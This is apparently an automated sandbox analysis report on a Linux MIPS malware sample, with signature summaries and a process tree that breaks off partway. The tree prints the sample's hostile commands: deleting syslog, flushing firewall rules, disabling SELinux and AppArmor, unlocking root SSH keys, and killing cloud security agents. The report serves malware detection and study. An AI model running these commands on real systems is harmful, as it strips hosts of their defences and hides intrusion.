1e39f5f7d640646d7b219aedb10f8db7e89279597c59f3a8944fcee1b9827dda

Analysis

max time kernel
150s
max time network
56s
platform
debian-9_mips
resource
debian9-mipsbe-20240226-en
resource tags

arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
31-03-2024 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
Size

41KB
MD5

5c75e6f27cc568187e4b7a6371c61181
SHA1

b485da0e29adf4b1c34e9b833f0aba7e7b40655d
SHA256

1e39f5f7d640646d7b219aedb10f8db7e89279597c59f3a8944fcee1b9827dda
SHA512

bbd352c6fc2f2e0dd1db3c81eff5499ed45f1c70bb37a536aac39cebc4b89964c8fd584272c5fb0690bd26cde961a55602b3dabef7adc9cb11d01bbfbad94282
SSDEEP

768:o7+FNcuFVc2zV0xvfK4urZuishkZBxWJY:bF+Ec20/url/xWJY

Score

7^/10

Malware Config

Signatures

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

Processes:

iptables

pid	Process
711	iptables

Attempts to change immutable files 30 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

chattrchattrchattrchattrsystemctlchattrchattrchattrxargschattrxargsxargschattrgrepgrepxargschattrchattrchattrxargssystemctlxargschattrxargsxargschattrchattrxargschattrxargs

pid	Process
1071	chattr
1072	chattr
1074	chattr
709	chattr
798	systemctl
1065	chattr
1075	chattr
1076	chattr
1099	xargs
721	chattr
828	xargs
1117	xargs
718	chattr
754	grep
757	grep
821	xargs
1066	chattr
1073	chattr
707	chattr
1093	xargs
770	systemctl
897	xargs
1070	chattr
1087	xargs
1111	xargs
1068	chattr
1069	chattr
1105	xargs
1067	chattr
1082	xargs

Deletes log files 1 TTPs 1 IoCs

Deletes log files on the system.

Indicator Removal

T1070

Processes:

apt-get

description	ioc	Process
File deleted	/var/log/apt/eipp.log.xz	apt-get

Disables AppArmor 28 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	Process
784	systemctl
779	systemctl
816	systemctl
759	systemctl
794	systemctl
795	systemctl
798	systemctl
802	systemctl
806	systemctl
779	systemctl
779	systemctl
791	systemctl
779	systemctl
759	systemctl
778	systemctl
782	systemctl
779	systemctl
789	systemctl
804	systemctl
759	systemctl
800	systemctl
809	systemctl
810	systemctl
779	systemctl
759	systemctl
759	systemctl
759	systemctl
813	systemctl

Disables SELinux 1 IoCs

Disables SELinux security module.

Processes:

setenforce

pid	Process
758	setenforce

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspssysctlpspspspsps

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	sysctl
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Write file to user bin folder 1 TTPs 10 IoCs

Hijack Execution Flow

T1574

Processes:

dpkg5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

description	ioc	Process
File opened for modification	/usr/sbin/unhide_rb.dpkg-new	dpkg
File opened for modification	/usr/bin/ip6network	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/rctlcli	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/systemd-network	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/irqbalanced	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/pamdicks	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/sbin/unhide-linux.dpkg-new	dpkg
File opened for modification	/usr/sbin/unhide-posix.dpkg-new	dpkg
File opened for modification	/usr/sbin/unhide-tcp.dpkg-new	dpkg
File opened for modification	/usr/bin/kswaped	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

Enumerates kernel/hardware configuration 1 TTPs 32 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

unhidepspspspspspspspspspspspspspspspspspsps

description	ioc	Process
File opened for reading	/proc/31885	unhide
File opened for reading	/proc/675/status	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/8584	unhide
File opened for reading	/proc/25123	unhide
File opened for reading	/proc/31627	unhide
File opened for reading	/proc/22693	unhide
File opened for reading	/proc/24493	unhide
File opened for reading	/proc/693/stat	ps
File opened for reading	/proc/156/stat	ps
File opened for reading	/proc/2981	unhide
File opened for reading	/proc/4921	unhide
File opened for reading	/proc/19033	unhide
File opened for reading	/proc/7450	unhide
File opened for reading	/proc/16604	unhide
File opened for reading	/proc/21650	unhide
File opened for reading	/proc/84/stat	ps
File opened for reading	/proc/950	unhide
File opened for reading	/proc/1892	unhide
File opened for reading	/proc/6062	unhide
File opened for reading	/proc/6224	unhide
File opened for reading	/proc/31557	unhide
File opened for reading	/proc/32719	unhide
File opened for reading	/proc/22516	unhide
File opened for reading	/proc/25409	unhide
File opened for reading	/proc/26087	unhide
File opened for reading	/proc/29423	unhide
File opened for reading	/proc/31057	unhide
File opened for reading	/proc/19448	unhide
File opened for reading	/proc/68/stat	ps
File opened for reading	/proc/4/status	ps
File opened for reading	/proc/74/stat	ps
File opened for reading	/proc/695/status	ps
File opened for reading	/proc/8444	unhide
File opened for reading	/proc/234/task/234/status	ps
File opened for reading	/proc/7596	unhide
File opened for reading	/proc/23968	unhide
File opened for reading	/proc/25148	unhide
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/23/status	ps
File opened for reading	/proc/9496	unhide
File opened for reading	/proc/15164	unhide
File opened for reading	/proc/15815	unhide
File opened for reading	/proc/20843	unhide
File opened for reading	/proc/37/stat	ps
File opened for reading	/proc/2208	unhide
File opened for reading	/proc/8769	unhide
File opened for reading	/proc/10995	unhide
File opened for reading	/proc/12207	unhide
File opened for reading	/proc/68/status	ps
File opened for reading	/proc/27272	unhide
File opened for reading	/proc/122/cmdline	ps
File opened for reading	/proc/19586	unhide
File opened for reading	/proc/24264	unhide
File opened for reading	/proc/25570	unhide
File opened for reading	/proc/14480	unhide
File opened for reading	/proc/27616	unhide
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/697/task	ps
File opened for reading	/proc/356/stat	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/383/stat	ps
File opened for reading	/proc/327/stat	ps

Writes file to tmp directory 16 IoCs

Malware often drops required files in the /tmp directory.

Processes:

apt-getapt-extracttemplatesapt-get

description	ioc	Process
File opened for modification	/tmp/fileutl.message.eGqdg7	apt-get
File opened for modification	/tmp/fileutl.message.K85VWo	apt-get
File opened for modification	/tmp/fileutl.message.5Mzipo	apt-extracttemplates
File opened for modification	/tmp/fileutl.message.drVlp2	apt-get
File opened for modification	/tmp/fileutl.message.9j8eu2	apt-get
File opened for modification	/tmp/fileutl.message.67z6m2	apt-get
File opened for modification	/tmp/fileutl.message.sHkRhv	apt-get
File opened for modification	/tmp/fileutl.message.xdGS37	apt-extracttemplates
File opened for modification	/tmp/fileutl.message.Konkcu	apt-get
File opened for modification	/tmp/fileutl.message.TU6l2e	apt-extracttemplates
File opened for modification	/tmp/fileutl.message.OSibd3	apt-get
File opened for modification	/tmp/fileutl.message.6oo23v	apt-get
File opened for modification	/tmp/fileutl.message.K5GgmJ	apt-get
File opened for modification	/tmp/fileutl.message.SMFR8J	apt-get
File opened for modification	/tmp/fileutl.message.RlHbb7	apt-extracttemplates
File opened for modification	/tmp/fileutl.message.i3UIh6	apt-get

/tmp/5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
/tmp/5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
1⤵
- Write file to user bin folder
PID:697
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:698
- /bin/chmod
  chmod 777 /usr/bin/chattr
  2⤵
  PID:699
- /bin/chmod
  chmod 777 /bin/chattr
  2⤵
  PID:703
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:707
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:709
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:711
- /sbin/sysctl
  sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Reads CPU attributes
  PID:716
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:718
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:721
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:723
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:725
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:727
- /bin/cat
  cat /var/spool/cron/1
  2⤵
  PID:729
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:731
- /bin/mv
  mv /usr/bin/wgettnt /usr/bin/wd1
  2⤵
  PID:739
- /bin/mv
  mv /usr/bin/curltnt /usr/bin/cd1
  2⤵
  PID:740
- /bin/mv
  mv /usr/bin/wget1 /usr/bin/wd1
  2⤵
  PID:741
- /bin/mv
  mv /usr/bin/curl1 /usr/bin/cd1
  2⤵
  PID:742
- /bin/mv
  mv /usr/bin/cur /usr/bin/cd1
  2⤵
  PID:743
- /bin/mv
  mv /usr/bin/cdl /usr/bin/cd1
  2⤵
  PID:744
- /bin/mv
  mv /usr/bin/cdt /usr/bin/cd1
  2⤵
  PID:745
- /bin/mv
  mv /usr/bin/xget /usr/bin/wd1
  2⤵
  PID:746
- /bin/mv
  mv /usr/bin/wge /usr/bin/wd1
  2⤵
  PID:747
- /bin/mv
  mv /usr/bin/wdl /usr/bin/wd1
  2⤵
  PID:748
- /bin/mv
  mv /usr/bin/wdt /usr/bin/wd1
  2⤵
  PID:750
- /bin/mv
  mv /usr/bin/wget /usr/bin/wd1
  2⤵
  PID:751
- /bin/mv
  mv /usr/bin/curl /usr/bin/cd1
  2⤵
  PID:752
- /bin/ps
  ps aux
  2⤵
  PID:753
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:754
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:757
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:756
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:758
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:759
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:760
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:761
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:762
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:766
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:767
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:768
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:769
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Attempts to change immutable files
    - Enumerates kernel/hardware configuration
    PID:770
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:771
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:772
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:773
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:774
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:775
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:776
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:777
- /usr/local/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:759
- /usr/local/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:759
- /usr/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:759
- /usr/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:759
- /sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:759
- /bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:759
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:778
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:779
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:780
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:781
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:782
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:789
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:791
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:794
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:795
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Attempts to change immutable files
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:798
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:800
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:802
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:804
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:806
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:809
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:810
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:813
- /usr/local/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:779
- /usr/local/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:779
- /usr/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:779
- /usr/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:779
- /sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:779
- /bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:779
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:816
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:817
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:820
- /bin/grep
  grep aegis
  2⤵
  PID:819
- /bin/grep
  grep -v grep
  2⤵
  PID:818
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:821
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:828
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:827
- /bin/grep
  grep Yun
  2⤵
  PID:826
- /bin/grep
  grep -v grep
  2⤵
  PID:825
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:824
- /bin/rm
  rm -rf /usr/local/aegis
  2⤵
  PID:831
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:832
- /bin/sleep
  sleep 1
  2⤵
  PID:833
- /usr/bin/apt-get
  apt-get install -y unhide
  2⤵
  - Deletes log files
  - Writes file to tmp directory
  PID:846
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:851
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:854
- - /usr/lib/apt/methods/http
    /usr/lib/apt/methods/http
    3⤵
    PID:863
- - /usr/lib/apt/methods/http
    /usr/lib/apt/methods/http
    3⤵
    PID:864
- - /bin/sh
    /bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"
    3⤵
    PID:865
  - - /usr/sbin/dpkg-preconfigure
      /usr/sbin/dpkg-preconfigure --apt
      4⤵
      PID:866
    - - /usr/local/sbin/locale
        
        locale charmap
        5⤵
        
        PID:867
    - - /usr/local/bin/locale
        
        locale charmap
        5⤵
        
        PID:867
    - - /usr/sbin/locale
        
        locale charmap
        5⤵
        
        PID:867
    - - /usr/bin/locale
        
        locale charmap
        5⤵
        
        PID:867
- - /usr/bin/dpkg
    /usr/bin/dpkg --assert-multi-arch
    3⤵
    PID:873
- - /usr/bin/dpkg
    /usr/bin/dpkg --status-fd 14 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb
    3⤵
    - Write file to user bin folder
    PID:874
  - - /usr/local/sbin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb
      4⤵
      PID:875
  - - /usr/local/bin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb
      4⤵
      PID:875
  - - /usr/sbin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb
      4⤵
      PID:875
  - - /usr/bin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb
      4⤵
      PID:875
  - - /usr/local/sbin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:876
  - - /usr/local/bin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:876
  - - /usr/sbin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:876
  - - /usr/bin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:876
    - - /usr/local/sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:879
    - - /usr/local/bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:879
    - - /usr/sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:879
    - - /usr/bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:879
    - - /sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:879
    - - /bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:879
  - - /usr/local/sbin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb
      4⤵
      PID:880
  - - /usr/local/bin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb
      4⤵
      PID:880
  - - /usr/sbin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb
      4⤵
      PID:880
  - - /usr/bin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unhide_20130526-1+deb9u1_mips.deb
      4⤵
      PID:880
  - - /usr/local/sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:883
  - - /usr/local/bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:883
  - - /usr/sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:883
  - - /usr/bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:883
  - - /sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:883
  - - /bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:883
- - /usr/bin/dpkg
    /usr/bin/dpkg --status-fd 14 --configure --pending
    3⤵
    PID:884
  - - /var/lib/dpkg/info/unhide.postinst
      /var/lib/dpkg/info/unhide.postinst configure
      4⤵
      PID:885
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:886
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:887
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:888
- /usr/bin/apt-get
  apt-get install -y gawk
  2⤵
  - Writes file to tmp directory
  PID:889
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:890
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:891
- /bin/sleep
  sleep 1
  2⤵
  PID:893
- /usr/sbin/unhide
  /usr/sbin/unhide quick
  2⤵
  - Reads runtime system information
  PID:894
- - /bin/sh
    sh -c "ps --no-header -p 1 o pid"
    3⤵
    PID:898
  - - /bin/ps
      ps --no-header -p 1 o pid
      4⤵
      Reads CPU attributes
      PID:899
- - /bin/sh
    sh -c "ps --no-header -p 2 o pid"
    3⤵
    PID:900
  - - /bin/ps
      ps --no-header -p 2 o pid
      4⤵
      Reads CPU attributes
      PID:901
- - /bin/sh
    sh -c "ps --no-header -p 3 o pid"
    3⤵
    PID:902
  - - /bin/ps
      ps --no-header -p 3 o pid
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:903
- - /bin/sh
    sh -c "ps --no-header -p 4 o pid"
    3⤵
    PID:904
  - - /bin/ps
      ps --no-header -p 4 o pid
      4⤵
      Reads CPU attributes
      PID:905
- - /bin/sh
    sh -c "ps --no-header -p 5 o pid"
    3⤵
    PID:906
  - - /bin/ps
      ps --no-header -p 5 o pid
      4⤵
      Reads CPU attributes
      PID:907
- - /bin/sh
    sh -c "ps --no-header -p 6 o pid"
    3⤵
    PID:908
  - - /bin/ps
      ps --no-header -p 6 o pid
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:909
- - /bin/sh
    sh -c "ps --no-header -p 7 o pid"
    3⤵
    PID:910
  - - /bin/ps
      ps --no-header -p 7 o pid
      4⤵
      PID:911
- - /bin/sh
    sh -c "ps --no-header -p 8 o pid"
    3⤵
    PID:912
  - - /bin/ps
      ps --no-header -p 8 o pid
      4⤵
      Reads CPU attributes
      PID:913
- - /bin/sh
    sh -c "ps --no-header -p 9 o pid"
